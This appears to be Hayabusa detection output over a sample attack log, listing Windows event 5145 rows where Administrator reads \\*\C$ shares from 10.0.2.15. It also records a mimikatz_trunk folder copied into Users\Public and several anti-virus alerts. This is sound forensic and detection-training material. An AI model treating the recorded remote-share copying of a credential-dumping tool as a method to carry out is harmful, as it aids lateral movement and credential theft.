+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | 